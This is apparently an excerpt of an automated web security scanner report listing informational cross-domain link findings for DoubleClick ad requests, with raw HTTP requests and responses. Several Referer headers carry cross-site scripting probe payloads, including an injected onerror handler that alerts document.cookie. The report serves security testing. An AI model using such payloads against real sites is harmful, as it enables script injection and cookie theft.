<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;">

<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
dgEgK3iBOAEApoFGAi8zz4Q4qnOGhj_n-1uIMDJ6RIo1IKZAdoFAggA&num=0&sig=AGiWqtwcQ6g5aM4yn-MQT1K92KmwGDbxdw&client=&adurl=http://www.orbitz.com/App/PerformMDLPDealsContent%3Fdeal_id%3Dalbertaski%26cnt%3DOVI"><img src="http://s0.2mdn.net/2507092/Orbitz_300x250_BU.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.23. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4406.Orbitzcom/B5147944.11

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.11;sz=728x90;ord=bKwueto,bguqjmyAjxed?

The response contains the following links to other domains:

http://s0.2mdn.net/2045811/MI_RH_Q1_2011_BACKUP_728x90_V1.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N4406.Orbitzcom/B5147944.11;sz=728x90;ord=bKwueto,bguqjmyAjxed? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/cacheable/ad.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 01 Feb 2011 15:24:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5478

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
k%3Bh%3Dv8/3aa1/3/0/%2a/w%3B235053550%3B0-0%3B0%3B58885595%3B3454-728/90%3B40295350/40313137/1%3B%3B%7Esscs%3D%3fhttp://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=marriott-renaissance&cnt=PRO"><img src="http://s0.2mdn.net/2045811/MI_RH_Q1_2011_BACKUP_728x90_V1.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

17.24. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4406.Orbitzcom/B5147944.4

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4;sz=728x90;ord=bkkcdnf,bguqjkndpyrh?

The response contains the following links to other domains:

http://s0.2mdn.net/2045811/MI_RH_Q1_2011_BACKUP_728x90_V1.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 15:37:55 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 01 Feb 2011 15:22:55 GMT
Cache-Control: private, x-gzip-ok=""
Expires: Tue, 01 Feb 2011 15:22:55 GMT
Content-Length: 5478

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
k%3Bh%3Dv8/3aa1/3/0/%2a/e%3B235053550%3B0-0%3B0%3B58885574%3B3454-728/90%3B40295350/40313137/1%3B%3B%7Esscs%3D%3fhttp://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=marriott-renaissance&cnt=PRO"><img src="http://s0.2mdn.net/2045811/MI_RH_Q1_2011_BACKUP_728x90_V1.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

17.25. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4406.Orbitzcom/B5147944.5

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.5;sz=160x160;ord=ccxisad,bguqjnaAjxeK?

The response contains the following links to other domains:

http://s0.2mdn.net/2045811/MI_RH_Q1_2011_BACKUP_160x160_V1.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N4406.Orbitzcom/B5147944.5;sz=160x160;ord=ccxisad,bguqjnaAjxeK? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/cacheable/ad.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 01 Feb 2011 15:24:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5479

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
ck%3Bh%3Dv8/3aa1/3/0/%2a/p%3B235053539%3B0-0%3B0%3B58885576%3B23-160/160%3B40295355/40313142/1%3B%3B%7Esscs%3D%3fhttp://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=marriott-renaissance&cnt=PRO"><img src="http://s0.2mdn.net/2045811/MI_RH_Q1_2011_BACKUP_160x160_V1.jpg" width="160" height="160" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

17.26. http://ad.doubleclick.net/adi/N553.msn.com/B5114832.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.msn.com/B5114832.2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N553.msn.com/B5114832.2;sz=160x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/83000000000033436.1?!&&PID=8084873&UIT=G&TargetID=38284301&AN=1344882713&PG=SPTSN3&ASID=c40951acad93491c9551811a6cfa3627&destination=;ord=1344882713?

The response contains the following links to other domains:

http://s0.2mdn.net/1297440/PRG_Success60_160x600_40k.gif
http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/83000000000033436.1?!&&PID=8084873&UIT=G&TargetID=38284301&AN=1344882713&PG=SPTSN3&ASID=c40951acad93491c9551811a6cfa3627&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa6/17/c0/%2a/f%3B234084306%3B2-0%3B0%3B57847540%3B2321-160/600%3B39072369/39090126/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://www201.americanexpress.com/cards/apply/jsp/includes/dualBUChargeMCLP.jsp?openeep=17216&ccsgeep=40513&v=5&tab=personal

Request

GET /adi/N553.msn.com/B5114832.2;sz=160x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/83000000000033436.1?!&&PID=8084873&UIT=G&TargetID=38284301&AN=1344882713&PG=SPTSN3&ASID=c40951acad93491c9551811a6cfa3627&destination=;ord=1344882713? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 06 Feb 2011 14:17:34 GMT
Expires: Sun, 06 Feb 2011 14:22:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1675

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<a href="http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/83000000000033436.1?!&&PID=8084873&UIT=G&TargetID=38284301&AN=1344882713&PG=SPTSN3&ASID=c40951acad93491c9551811a6cfa3627&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa6/17/c0/%2a/f%3B234084306%3B2-0%3B0%3B57847540%3B2321-160/600%3B39072369/39090126/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://www201.americanexpress.com/cards/apply/jsp/includes/dualBUChargeMCLP.jsp?openeep=17216&ccsgeep=40513&v=5&tab=personal" target="_blank">
<img src="http://s0.2mdn.net/1297440/PRG_Success60_160x600_40k.gif" border="0" alt=""/></a>
...[SNIP]...

17.27. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.5

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.5;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/39000000000033052.1?!&&PID=8195414&UIT=G&TargetID=38194737&AN=17498803&PG=SPTSN1&ASID=2b7f8f040896431596e9eda158a970b9&destination=;ord=17498803?

The response contains the following links to other domains:

http://s0.2mdn.net/2530996/Schwab_AI_Q310_895-Flatv2_728x90.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/39000000000033052.1?!&&PID=8195414&UIT=G&TargetID=38194737&AN=17498803&PG=SPTSN1&ASID=2b7f8f040896431596e9eda158a970b9&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa6/17/be/%2a/x%3B234266819%3B1-0%3B0%3B58044030%3B3454-728/90%3B38824361/38842118/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.5;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/39000000000033052.1?!&&PID=8195414&UIT=G&TargetID=38194737&AN=17498803&PG=SPTSN1&ASID=2b7f8f040896431596e9eda158a970b9&destination=;ord=17498803? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 06 Feb 2011 14:17:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6367

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/39000000000033052.1?!&&PID=8195414&UIT=G&TargetID=38194737&AN=17498803&PG=SPTSN1&ASID=2b7f8f040896431596e9eda158a970b9&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa6/17/be/%2a/x%3B234266819%3B1-0%3B0%3B58044030%3B3454-728/90%3B38824361/38842118/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU"><img src="http://s0.2mdn.net/2530996/Schwab_AI_Q310_895-Flatv2_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.28. http://ad.doubleclick.net/adi/dmd.ehow/computers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/dmd.ehow/computers

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/dmd.ehow/computers;cat=computersoftware;scat=;sscat=;art=;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=1;rsi=;tile=3;sz=300x250;ord=4760230283606905?

The response contains the following link to another domain:

http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=computers&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/v%3B228957569%3B0-0%3B0%3B45421603%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f

Request

GET /adi/dmd.ehow/computers;cat=computersoftware;scat=;sscat=;art=;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=1;rsi=;tile=3;sz=300x250;ord=4760230283606905? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:13:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 550

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=computers&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/v%3B228957569%3B0-0%3B0%3B45421603%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f"></SCRIPT>
...[SNIP]...

17.29. http://ad.doubleclick.net/adi/dmd.ehow/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/dmd.ehow/homepage

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/dmd.ehow/homepage;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132?

The response contains the following link to another domain:

http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepage&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/n%3B228957569%3B0-0%3B0%3B45421688%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f

Request

GET /adi/dmd.ehow/homepage;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:11:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 549

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepage&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/n%3B228957569%3B0-0%3B0%3B45421688%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f"></SCRIPT>
...[SNIP]...

17.30. http://ad.doubleclick.net/adj/ami.mf.fitness/abs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ami.mf.fitness/abs

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ami.mf.fitness/abs;sz=160x600;tile=2;aid=136;ord=7511884768027812?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2652201/6-mf_takeover_160x600.jpg

Request

GET /adj/ami.mf.fitness/abs;sz=160x600;tile=2;aid=136;ord=7511884768027812? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/136?cid=RSS
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 14:26:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 360

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa6/0/0/%2a/t;233612100;0-0;0;38964796;2321-160/600;39983247/40001034/1;;~aopt=2/0/ff/0;~sscs=%3fhttp://tracking.searchmarketing.com/click.asp?aid=744664787"><img src="http://s0.2mdn.net/viewad/2652201/6-mf_takeover_160x600.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.31. http://ad.doubleclick.net/adj/ami.mf.fitness/abs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ami.mf.fitness/abs

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ami.mf.fitness/abs;sz=728x90;tile=1;aid=136;dcopt=ist;ord=7511884768027812?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2652201/MensFitness_NO2Red_728x90a.jpg

Request

GET /adj/ami.mf.fitness/abs;sz=728x90;tile=1;aid=136;dcopt=ist;ord=7511884768027812? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/136?cid=RSS
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 14:26:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 364

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa6/0/0/%2a/c;233612094;0-0;0;38964796;3454-728/90;39983336/40001123/1;;~aopt=2/0/ff/0;~sscs=%3fhttp://tracking.searchmarketing.com/click.asp?aid=744664787"><img src="http://s0.2mdn.net/viewad/2652201/MensFitness_NO2Red_728x90a.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.32. http://ad.doubleclick.net/adj/ami.mf.fitness/abs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ami.mf.fitness/abs

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ami.mf.fitness/abs;sz=300x250,300x600;tile=4;aid=136;ord=7511884768027812?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2652201/MensFitness_NO2Red_300x250b.jpg

Request

GET /adj/ami.mf.fitness/abs;sz=300x250,300x600;tile=4;aid=136;ord=7511884768027812? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/136?cid=RSS
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 14:27:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 366

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa6/0/0/%2a/n;233612097;0-0;0;38964796;4307-300/250;39983274/40001061/1;;~aopt=2/0/ff/0;~sscs=%3fhttp://tracking.searchmarketing.com/click.asp?aid=744664787"><img src="http://s0.2mdn.net/viewad/2652201/MensFitness_NO2Red_300x250b.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.33. http://ad.doubleclick.net/adj/ami.mf.fitness/abs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ami.mf.fitness/abs

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ami.mf.fitness/abs;sz=728x90;tile=5;aid=136;ord=7511884768027812?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2652201/MensFitness_NO2Red_728x90b.jpg

Request

GET /adj/ami.mf.fitness/abs;sz=728x90;tile=5;aid=136;ord=7511884768027812? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/136?cid=RSS
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 14:27:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 364

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa6/0/0/%2a/s;233612095;0-0;0;38964796;3454-728/90;39983326/40001113/1;;~aopt=2/0/ff/0;~sscs=%3fhttp://tracking.searchmarketing.com/click.asp?aid=744664787"><img src="http://s0.2mdn.net/viewad/2652201/MensFitness_NO2Red_728x90b.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.34. http://ad.doubleclick.net/adj/ami.mf.fitness/abs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ami.mf.fitness/abs

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ami.mf.fitness/abs;sz=300x250;tile=3;aid=136;ord=7511884768027812?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2652201/1-MensFitness_NO2Red_300x250a.jpg

Request

GET /adj/ami.mf.fitness/abs;sz=300x250;tile=3;aid=136;ord=7511884768027812? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/136?cid=RSS
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 14:27:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 368

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa6/0/0/%2a/z;233612096;0-0;0;38964796;4307-300/250;39983304/40001091/1;;~aopt=2/0/ff/0;~sscs=%3fhttp://tracking.searchmarketing.com/click.asp?aid=744664787"><img src="http://s0.2mdn.net/viewad/2652201/1-MensFitness_NO2Red_300x250a.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.35. http://ad.doubleclick.net/adj/ami.mf.fitness/abs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ami.mf.fitness/abs

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ami.mf.fitness/abs;sz=1020x200;tile=9;aid=136;ord=7511884768027812?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2652201/MensFitness_NO2Red_1020x200.jpg

Request

GET /adj/ami.mf.fitness/abs;sz=1020x200;tile=9;aid=136;ord=7511884768027812? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/136?cid=RSS
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 14:26:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 368

